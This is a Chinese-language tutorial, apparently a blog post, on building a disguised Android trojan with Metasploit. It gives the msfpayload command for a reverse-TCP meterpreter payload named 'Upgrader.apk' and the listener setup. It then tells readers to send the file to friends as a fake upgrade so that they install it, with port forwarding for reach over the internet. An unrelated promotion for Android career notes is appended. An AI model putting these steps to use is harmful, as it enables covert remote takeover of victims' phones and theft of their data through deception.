第 1 步:打开 Kali Linux
- 打开一个终端,制作一个木马.apk
- 您可以通过键入以下内容来执行此操作:
- msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (把LHOST换成你自己的IP)
- 您还可以通过 Interet在 LHOST 中使用您的公共/外部 IP和端口转发来破解 WAN 上的 android (如果您在评论部分有问题,请问我关于端口转发的问题)
第 2 步:打开另一个终端
- 打开另一个终端,直到生成文件。
- 加载 metasploit 控制台,输入:msfconsole
第 3 步:设置监听器
- 加载后(这需要时间),通过键入以下内容加载多处理程序漏洞利用:use exploit/multi/handler
- 通过键入以下内容设置(反向)有效载荷:set payload android/meterpreter/reverse_tcp
- 设置 L 主机类型:设置LHOST 192.168.0.4
第 4 步:利用
- 最后输入:exploit启动监听器。
- 将您制作的应用程序 (Upgrader.apk) 从根文件夹复制到您的 Android 手机。
- 然后使用上传到 Dropbox 或任何共享网站(例如:www.speedyshare.com)将其发送。
- 然后将网站给你的链接发送给你的朋友并利用他们的手机(仅限局域网,但如果你使用 WAN 方法,那么你可以在互联网上的任何地方使用漏洞)
- 让受害者安装 Upgrader 应用程序(因为他认为这是为了升级他手机上的某些功能)
- 但是,应从 Android 手机的安全设置中启用(如果未启用)允许安装来自未知来源的应用程序选项,以允许安装木马。
- 当他点击打开时……
第 5 步:
出现meterpreter提示:
最后
如果想要成为架构师或想突破20~30K薪资范畴,那就不要局限在编码,业务,要会选型、扩展,提升编程思维。此外,良好的职业规划也很重要,学习的习惯很重要,但是最重要的还是要能持之以恒,任何不能坚持落实的计划都是空谈。
如果你没有方向,这里给大家分享一套由阿里高级架构师编写的《Android八大模块进阶笔记》,帮大家将杂乱、零散、碎片化的知识进行体系化的整理,让大家系统而高效地掌握Android开发的各个知识点。
相对于我们平时看的碎片化内容,这份笔记的知识点更系统化,更容易理解和记忆,是严格按照知识体系编排的。
全套视频资料:
一、面试合集
二、源码解析合集
三、开源框架合集
欢迎大家一键三连支持,若需要文中资料,直接点击文末CSDN官方认证微信卡片免费领取↓↓↓
